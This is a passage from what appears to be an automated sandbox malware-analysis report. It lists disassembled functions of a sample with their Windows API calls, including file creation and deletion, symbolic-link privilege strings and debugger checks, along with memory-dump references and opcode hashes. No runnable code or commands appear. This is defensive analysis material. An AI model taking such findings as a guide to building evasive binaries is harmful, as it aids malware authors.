    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 5fcae6f362c2d3dbea27c32f1d67f8fd07702c43362a7db28490085842a4e06e
    • Instruction ID: dc92b1bd22e8339b0a8290aa453cea9dabc9a4cd7027e2f5841905090e717ea5
    • Opcode Fuzzy Hash: 5fcae6f362c2d3dbea27c32f1d67f8fd07702c43362a7db28490085842a4e06e
    • Instruction Fuzzy Hash: C0A002952651477C351463517D56F7E111DC6D1B15330452FF511944515C9119451076
    Function 000CF6E5 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 000CF69B
      • Part of subcall function 000CF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000CFA4C
      • Part of subcall function 000CF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000CFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 7ea9eae64a9a11591b7f503652cb6affdf8e63ccf91712f3ff64311872b32c3a
    • Instruction ID: b31545519e1748d301cb91006e4f3a8831fcee5ff807ea41c15247247b435fe6
    • Opcode Fuzzy Hash: 7ea9eae64a9a11591b7f503652cb6affdf8e63ccf91712f3ff64311872b32c3a
    • Instruction Fuzzy Hash: 93A001A62B9143BC361863626E17E7E021EC6D8B65334893FF502A94D2A8A119452572
    Function 000BA880 Relevance: 1.3, APIs: 1, Instructions: 30COMMON
    Download Yara Rule
    APIs
    • CloseHandle.KERNEL32(000000FF,?,?,000BA83D,?,?,?,?,?,000E37FF,000000FF), ref: 000BA89B
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: CloseHandle
    • String ID:
    • API String ID: 2962429428-0
    • Opcode ID: cc4ac89c1a4e5bd767a809a7fc200fde657dbbe77ce84a5c5b14bbd86cfeef5a
    • Instruction ID: 82c87013a7836c7fb7ce9dcbe7ff0395f56855f5cfda01c8993ea697dd890e99
    • Opcode Fuzzy Hash: cc4ac89c1a4e5bd767a809a7fc200fde657dbbe77ce84a5c5b14bbd86cfeef5a
    • Instruction Fuzzy Hash: 29F0E230582B058FEB308A24C4887D2B3E4AB13335F041B5FC0E243DE0EB74698E8A51

    Non-executed Functions

    Function 000CD410 Relevance: 33.5, APIs: 17, Strings: 2, Instructions: 233windowfileCOMMON
    Download Yara Rule
    APIs
      • Part of subcall function 000B12F6: GetParent.USER32(?), ref: 000B132A
      • Part of subcall function 000B12F6: GetDlgItem.USER32(00000000,00003021), ref: 000B133A
      • Part of subcall function 000B12F6: SetWindowTextW.USER32(00000000,000E45F4), ref: 000B1350
    • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 000CD4A1
    • EndDialog.USER32(?,00000006), ref: 000CD4B4
    • GetDlgItem.USER32(?,0000006C), ref: 000CD4D0
    • SetFocus.USER32(00000000), ref: 000CD4D7
    • SetDlgItemTextW.USER32(?,00000065,?), ref: 000CD511
    • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 000CD548
    • FindFirstFileW.KERNEL32(?,?), ref: 000CD55E
      • Part of subcall function 000CBC1B: FileTimeToSystemTime.KERNEL32(?,?), ref: 000CBC2F
      • Part of subcall function 000CBC1B: SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 000CBC40
      • Part of subcall function 000CBC1B: SystemTimeToFileTime.KERNEL32(?,?), ref: 000CBC4E
      • Part of subcall function 000CBC1B: FileTimeToSystemTime.KERNEL32(?,?), ref: 000CBC5C
      • Part of subcall function 000CBC1B: GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 000CBC77
      • Part of subcall function 000CBC1B: GetTimeFormatW.KERNEL32(00000400,?,?,00000000,?,00000032), ref: 000CBC9E
      • Part of subcall function 000CBC1B: _swprintf.LIBCMT ref: 000CBCC4
    • _swprintf.LIBCMT ref: 000CD5A7
      • Part of subcall function 000B4A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 000B4A33
    • SetDlgItemTextW.USER32(?,0000006A,?), ref: 000CD5BA
    • FindClose.KERNEL32(00000000), ref: 000CD5C1
    • _swprintf.LIBCMT ref: 000CD610
    • SetDlgItemTextW.USER32(?,00000068,?), ref: 000CD623
    • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 000CD640
    • _swprintf.LIBCMT ref: 000CD673
    • SetDlgItemTextW.USER32(?,0000006B,?), ref: 000CD686
    • _swprintf.LIBCMT ref: 000CD6D0
    • SetDlgItemTextW.USER32(?,00000069,?), ref: 000CD6E3
      • Part of subcall function 000CC083: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 000CC0A9
      • Part of subcall function 000CC083: GetNumberFormatW.KERNEL32(00000400,00000000,?,000F072C,?,?), ref: 000CC0F8
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: Item$Time$Text$_swprintf$FileSystem$FormatMessageSend$Find$CloseDateDialogFirstFocusInfoLocalLocaleNumberParentSpecificWindow__vswprintf_c_l
    • String ID: %s %s$REPLACEFILEDLG
    • API String ID: 2415798972-439456425
    • Opcode ID: 38c247153f1539342c9ec538c3374f973f48683c89186b0f877c5acaf942e5d2
    • Instruction ID: 0dea574a3feaf21ac848067897f01cd3a434e267eb2ffc8a16efca734db1605c
    • Opcode Fuzzy Hash: 38c247153f1539342c9ec538c3374f973f48683c89186b0f877c5acaf942e5d2
    • Instruction Fuzzy Hash: CB71C272548304BBE3359BA4DD49FFF77EDEB8A700F00482EB749D2481D675A9048762
    Function 000B7AAF Relevance: 28.3, APIs: 12, Strings: 4, Instructions: 337fileCOMMON
    Download Yara Rule
    APIs
    • __EH_prolog.LIBCMT ref: 000B7AB4
    • _wcslen.LIBCMT ref: 000B7B1D
    • _wcslen.LIBCMT ref: 000B7B8E
      • Part of subcall function 000B8704: GetCurrentProcess.KERNEL32(00000020,?), ref: 000B8713
      • Part of subcall function 000B8704: GetLastError.KERNEL32 ref: 000B8759
      • Part of subcall function 000B8704: CloseHandle.KERNEL32(?), ref: 000B8768
      • Part of subcall function 000BB470: DeleteFileW.KERNEL32(?,00000000,?,000BA438,?,?,?,?,000B892B,?,?,?,000E37FF,000000FF), ref: 000BB481
      • Part of subcall function 000BB470: DeleteFileW.KERNEL32(?,?,?,00000800,?,000BA438,?,?,?,?,000B892B,?,?,?,000E37FF,000000FF), ref: 000BB4AF
    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 000B7C43
    • CloseHandle.KERNEL32(00000000), ref: 000B7C5F
    • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 000B7DAB
      • Part of subcall function 000BB032: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,000B7ED0,?,?,?,00000000), ref: 000BB04C
      • Part of subcall function 000BB032: SetFileTime.KERNEL32(?,?,?,?), ref: 000BB100
      • Part of subcall function 000BA880: CloseHandle.KERNEL32(000000FF,?,?,000BA83D,?,?,?,?,?,000E37FF,000000FF), ref: 000BA89B
      • Part of subcall function 000BB8E6: SetFileAttributesW.KERNEL32(?,00000000,00000001,?,000BB5B5,?,?,?,000BB405,?,00000001,00000000,?,?), ref: 000BB8FA
      • Part of subcall function 000BB8E6: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,000BB5B5,?,?,?,000BB405,?,00000001,00000000,?,?), ref: 000BB92B
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: File$CloseHandle$AttributesCreateDelete_wcslen$BuffersCurrentErrorFlushH_prologLastProcessTime
    • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
    • API String ID: 3983180755-3508440684
    • Opcode ID: c60f5fe90c048ccdc48557c6ccd8bfdb0e60a36d0312949d77b76b0ce279c90c
    • Instruction ID: 0b8893d26fe94d29e6dc3f9d4e4608a63197f311062b914b59f9a9f1b4fcc5f1
    • Opcode Fuzzy Hash: c60f5fe90c048ccdc48557c6ccd8bfdb0e60a36d0312949d77b76b0ce279c90c
    • Instruction Fuzzy Hash: 3AC1D871904249AFEB21DB64CC85FEEB7ACAF44710F00456AF549E7283DB74EA44CBA1
    Function 000DEA9E Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODE
    Download Yara Rule
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: __floor_pentium4
    • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
    • API String ID: 4168288129-2761157908
    • Opcode ID: 7846e4a97fa0a0b6a2522bdf853161158af828625d39482e6b23fdbe6a18ade3
    • Instruction ID: 0664b4770b30b87c7a2fd906e4cabb84f4abf12beb537fb59ccb5fec4de946e5
    • Opcode Fuzzy Hash: 7846e4a97fa0a0b6a2522bdf853161158af828625d39482e6b23fdbe6a18ade3
    • Instruction Fuzzy Hash: 9BC23771E086298FDB659E28DD407EAB7B5EB44304F1481EBD84EE7341E774AE818F50
    Function 000B395A Relevance: 9.4, APIs: 2, Strings: 3, Instructions: 666COMMON
    Download Yara Rule
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: H_prolog_swprintf
    • String ID: CMT$h%u$hc%u
    • API String ID: 146138363-3282847064
    • Opcode ID: 42620bb06e3e0c50c4685815fd1da886dff133cf99ec89396bfd0037a692a1e2
    • Instruction ID: 24d1156a1f0dee210d988774fe8c8ba8548d21176402d9d0a1049ee491218176
    • Opcode Fuzzy Hash: 42620bb06e3e0c50c4685815fd1da886dff133cf99ec89396bfd0037a692a1e2
    • Instruction Fuzzy Hash: 2E42F4716042849FDF24DF34C895AEA3BE5AF15300F54447DFD4A8B283EB74AA89CB61
    Function 000B2EB6 Relevance: 7.8, APIs: 3, Strings: 1, Instructions: 804COMMON
    Download Yara Rule
    APIs
    • __EH_prolog.LIBCMT ref: 000B2EBF
    • _strlen.LIBCMT ref: 000B348B
      • Part of subcall function 000C15F9: __EH_prolog.LIBCMT ref: 000C15FE
      • Part of subcall function 000C2EC2: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,000BCF18,00000000,?,?), ref: 000C2EDE
    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000B35DD
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: H_prolog$ByteCharMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
    • String ID: CMT
    • API String ID: 1206968400-2756464174
    • Opcode ID: 5ea6a925460892ff2256ce7c8a1a06d6b0eefde4600cc76c736194c20878cbac
    • Instruction ID: 13aca2d8c2896c978194a36b5e45156e043f0b4b8d4bf8470c0b589206b7ace3
    • Opcode Fuzzy Hash: 5ea6a925460892ff2256ce7c8a1a06d6b0eefde4600cc76c736194c20878cbac
    • Instruction Fuzzy Hash: 406237716042848FDF29DF38C8956EA7BE1AF55300F18457EFC5A9B283DB70AA48CB51
    Function 000D09FA Relevance: 6.1, APIs: 4, Instructions: 73COMMON
    Download Yara Rule
    APIs
    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 000D0A06
    • IsDebuggerPresent.KERNEL32 ref: 000D0AD2
    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 000D0AF2
    • UnhandledExceptionFilter.KERNEL32(?), ref: 000D0AFC
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
    • String ID:
    • API String ID: 254469556-0
    • Opcode ID: 18333312405535513bb5410dcf9ebe26b8573e5a918ddca3f5c6158c5ac45944
    • Instruction ID: 6355225568ed9a75f46774687f68e4669470f388a997c797c9708a721c325750
    • Opcode Fuzzy Hash: 18333312405535513bb5410dcf9ebe26b8573e5a918ddca3f5c6158c5ac45944
    • Instruction Fuzzy Hash: AA312475D453199BEB20DFA4D989BCDBBB8AF08304F1041EAE40CAB251EB759A848F15
    Function 000CF81F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMONLIBRARYCODE
    Download Yara Rule
    APIs
    • VirtualQuery.KERNEL32(80000000,000CF764,0000001C,000CF959,00000000,?,?,?,?,?,?,?,000CF764,00000004,00113D24,000CF9E9), ref: 000CF830
    • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,000CF764,00000004,00113D24,000CF9E9), ref: 000CF84B
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: InfoQuerySystemVirtual
    • String ID: D
    • API String ID: 401686933-2746444292
    • Opcode ID: ddd158d8d619ab73d1a241a53d684543953cf2514c8454855dab13c8d9a9e353
    • Instruction ID: 953865185d2d64536845869aab70df1c380e6c5cb32d2cf97dcd867d9e5f4ae9
    • Opcode Fuzzy Hash: ddd158d8d619ab73d1a241a53d684543953cf2514c8454855dab13c8d9a9e353
    • Instruction Fuzzy Hash: 7901D832600109ABDB14DF29DC05BED7BEAEFD4324F08C134AD19DB154DA38D9058680
    Function 000D4FDF Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
    Download Yara Rule
    APIs
    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 000D50D7
    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 000D50E1
    • UnhandledExceptionFilter.KERNEL32(-00000325,?,?,?,?,?,00000000), ref: 000D50EE
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: ExceptionFilterUnhandled$DebuggerPresent
    • String ID:
    • API String ID: 3906539128-0
    • Opcode ID: f0c2fb91f66720686a2e59226b63c9130c54e096fe055cd72d3e661a817344de
    • Instruction ID: 3ae21c74271b8a7f5a0d329ebc8f1af1acb742d87496bfd9d3fc7253d85c89e8
    • Opcode Fuzzy Hash: f0c2fb91f66720686a2e59226b63c9130c54e096fe055cd72d3e661a817344de
    • Instruction Fuzzy Hash: 7E31C274941319ABCB61DF68DC88BDDBBB8AF18310F5041DAE80CA7291EB349F818F54
    Function 000DC4F8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
    Download Yara Rule
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID:
    • String ID: .
    • API String ID: 0-248832578
    • Opcode ID: 2f1a7c1ea1ad3a26f7bfaca2983b9c9cf172c0975192c25043c37925ec95818e
    • Instruction ID: 723b0f11ba8f54ab9a3879faaf7fd79e2082fb07bd078a80cf6c2523ef70138d
    • Opcode Fuzzy Hash: 2f1a7c1ea1ad3a26f7bfaca2983b9c9cf172c0975192c25043c37925ec95818e
    • Instruction Fuzzy Hash: 4831E17190034A6EEB649E78DC84EFB7BBDDB85314F00019AE91997252E630AE84CB60
    Function 000DE5F0 Relevance: 3.5, APIs: 2, Instructions: 464COMMONLIBRARYCODE
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: d08e2bcb8369247a90beecc4ac2937ecc20121a35f50d3dd5c946701bfc99d8e
    • Instruction ID: a0de0d2f1c94c00282623e0625a3c0d8a7b2a281c2fdae69f2b4f0e2ec39eaf4
    • Opcode Fuzzy Hash: d08e2bcb8369247a90beecc4ac2937ecc20121a35f50d3dd5c946701bfc99d8e
    • Instruction Fuzzy Hash: 3D022C71E012199BDF54DFA9C8906ADFBF1FF48314F25816AD819EB381D731AE418B90
    Function 000CC083 Relevance: 3.0, APIs: 2, Instructions: 45COMMON
    Download Yara Rule
    APIs
    • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 000CC0A9
    • GetNumberFormatW.KERNEL32(00000400,00000000,?,000F072C,?,?), ref: 000CC0F8
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: FormatInfoLocaleNumber
    • String ID:
    • API String ID: 2169056816-0
    • Opcode ID: ebe4249a77bd8ae2aac87abdc53c848f38c21425fbd8ec7a6c45d2d38652e3d7
    • Instruction ID: 65903b3331e27319f2d6250898cda288d8edceb09dc5af89b38f5fcdc145ecb2
